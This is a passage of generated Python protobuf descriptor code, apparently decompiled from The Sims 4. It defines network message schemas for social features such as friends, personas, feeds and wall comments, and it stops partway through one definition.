_SOCIALCLUSTERMESSAGETYPE = descriptor.EnumDescriptor(name='SocialClusterMessageType',
full_name='EA.Sims4.Network.SocialClusterMessageType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SOC_LOGIN',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_LOGOFF',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_PRESENCEUPDATE',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_FEEDUPDATE',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_ADD_FEEDSUB',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REMOVE_FEEDSUB',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_PRIVOP',
index=6,
number=6,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_QUEUED',
index=7,
number=8,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_CACHE_INVALIDATE',
index=8,
number=9,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REST_USER_REGISTER',
index=9,
number=10,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6856,
serialized_end=7118)
SFI_ITEM_DOWNLOADED = 0
SFI_ITEM_UPLOADED = 1
SFI_ITEM_FAVORITED = 2
SFI_ITEM_COMMENTED = 3
SFI_ITEM_SHOWCASED = 4
SFI_PROFILE_COMMENTED = 5
SFI_NEW_FOLLOWERS = 6
SOC_LOGIN = 0
SOC_LOGOFF = 1
SOC_PRESENCEUPDATE = 2
SOC_FEEDUPDATE = 3
SOC_ADD_FEEDSUB = 4
SOC_REMOVE_FEEDSUB = 5
SOC_BROADCAST_PRIVOP = 6
SOC_BROADCAST_QUEUED = 8
SOC_BROADCAST_CACHE_INVALIDATE = 9
SOC_REST_USER_REGISTER = 10
_SOCIALFRIENDMSG = descriptor.Descriptor(name='SocialFriendMsg',
full_name='EA.Sims4.Network.SocialFriendMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='simId',
full_name='EA.Sims4.Network.SocialFriendMsg.simId',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFriendMsg.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='note',
full_name='EA.Sims4.Network.SocialFriendMsg.note',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialFriendMsg.prefix',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFriendMsg.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cheatForce',
full_name='EA.Sims4.Network.SocialFriendMsg.cheatForce',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=112,
serialized_end=230)
_SOCIALPERSONARESPONSEMSG = descriptor.Descriptor(name='SocialPersonaResponseMsg',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='personas',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg.personas',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=232,
serialized_end=276)
_SOCIALGENERICRESPONSE = descriptor.Descriptor(name='SocialGenericResponse',
full_name='EA.Sims4.Network.SocialGenericResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='error',
full_name='EA.Sims4.Network.SocialGenericResponse.error',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='msg_type',
full_name='EA.Sims4.Network.SocialGenericResponse.msg_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postId',
full_name='EA.Sims4.Network.SocialGenericResponse.postId',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postParentId',
full_name='EA.Sims4.Network.SocialGenericResponse.postParentId',
index=3,
number=4,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=278,
serialized_end=405)
_SOCIALPLAYERINFOLIST_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='AccountName',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountName',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='AccountNotes',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountNotes',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='presence',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.presence',
index=2,
number=3,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='OnlineStatus2',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.OnlineStatus2',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='NucleusId',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.NucleusId',
index=4,
number=9,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='PlayerBio',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.PlayerBio',
index=5,
number=10,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.exclude_reported',
index=6,
number=11,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='IsUserBlocked',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.IsUserBlocked',
index=7,
number=12,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=501,
serialized_end=724)
_SOCIALPLAYERINFOLIST = descriptor.Descriptor(name='SocialPlayerInfoList',
full_name='EA.Sims4.Network.SocialPlayerInfoList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='players',
full_name='EA.Sims4.Network.SocialPlayerInfoList.players',
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALPLAYERINFOLIST_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=408,
serialized_end=724)
_SOCIALSEARCHMSG = descriptor.Descriptor(name='SocialSearchMsg',
full_name='EA.Sims4.Network.SocialSearchMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialSearchMsg.prefix',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='search_results',
full_name='EA.Sims4.Network.SocialSearchMsg.search_results',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=726,
serialized_end=823)
_ORIGINERRORMESSAGE = descriptor.Descriptor(name='OriginErrorMessage',
full_name='EA.Sims4.Network.OriginErrorMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='errorcode',
full_name='EA.Sims4.Network.OriginErrorMessage.errorcode',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='errormessage',
full_name='EA.Sims4.Network.OriginErrorMessage.errormessage',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=825,
serialized_end=886)
_SOCIALINVITERESPONSEMESSAGE = descriptor.Descriptor(name='SocialInviteResponseMessage',
full_name='EA.Sims4.Network.SocialInviteResponseMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='invitationid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationid',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='invitationtype',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationtype',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.inviternucleusid',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accepternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.accepternucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='actionSuccess',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.actionSuccess',
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=889,
serialized_end=1040)
_SOCIALCASSANDRATEST = descriptor.Descriptor(name='SocialCassandraTest',
full_name='EA.Sims4.Network.SocialCassandraTest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialCassandraTest.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1042,
serialized_end=1116)
_SOCIALFRIENDLISTREQUESTMESSAGE = descriptor.Descriptor(name='SocialFriendListRequestMessage',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='account_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.account_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friend_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.friend_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='address_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.address_str',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='object_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.object_str',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='reply_proxy_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.reply_proxy_id',
index=4,
number=5,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1119,
serialized_end=1255)
_SOCIALREQUESTNUCLEUSIDFROMPERSONA = descriptor.Descriptor(name='SocialRequestNucleusIdFromPersona',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='personaName',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.personaName',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1257,
serialized_end=1352)
_SOCIALNUCLEUSIDFROMPERSONARESPONSE = descriptor.Descriptor(name='SocialNucleusIdFromPersonaResponse',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1354,
serialized_end=1448)
_SOCIALEXCHANGEMESSAGE = descriptor.Descriptor(name='SocialExchangeMessage',
full_name='EA.Sims4.Network.SocialExchangeMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='envelope',
full_name='EA.Sims4.Network.SocialExchangeMessage.envelope',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1450,
serialized_end=1533)
_SOCIALFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialFollowersMessage',
full_name='EA.Sims4.Network.SocialFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='sfim_blob',
full_name='EA.Sims4.Network.SocialFollowersMessage.sfim_blob',
index=0,
number=1,
type=12,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1535,
serialized_end=1578)
_SOCIALFEEDITEMMESSAGE = descriptor.Descriptor(name='SocialFeedItemMessage',
full_name='EA.Sims4.Network.SocialFeedItemMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feed_type',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='metadata',
full_name='EA.Sims4.Network.SocialFeedItemMessage.metadata',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.nucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='quantity',
full_name='EA.Sims4.Network.SocialFeedItemMessage.quantity',
index=5,
number=6,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_nucleusid',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_persona',
index=7,
number=8,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='followers_blob',
full_name='EA.Sims4.Network.SocialFeedItemMessage.followers_blob',
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='is_maxis_curated',
full_name='EA.Sims4.Network.SocialFeedItemMessage.is_maxis_curated',
index=9,
number=10,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1581,
serialized_end=1928)
_SOCIALFEEDITEMUNSERIALIZEDMESSAGE = descriptor.Descriptor(name='SocialFeedItemUnserializedMessage',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='data',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.data',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='count_override',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.count_override',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1930,
serialized_end=2020)
_SOCIALWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialWallCommentMessage',
full_name='EA.Sims4.Network.SocialWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialWallCommentMessage.uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_id',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_persona',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialWallCommentMessage.message',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2022,
serialized_end=2122)
_SOCIALGETWALLCOMMENTSMESSAGE = descriptor.Descriptor(name='SocialGetWallCommentsMessage',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='starting_uuid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.starting_uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_results',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.num_results',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='messages',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.messages',
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='hidden',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.hidden',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.exclude_reported',
index=6,
number=7,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2125,
serialized_end=2342)
_SOCIALPOSTWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialPostWallCommentMessage',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialPostWallCommentMessage.message',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2345,
serialized_end=2475)
_SOCIALDELETEWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialDeleteWallCommentMessage',
full_name='EA.Sims4.Network.SocialDeleteWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
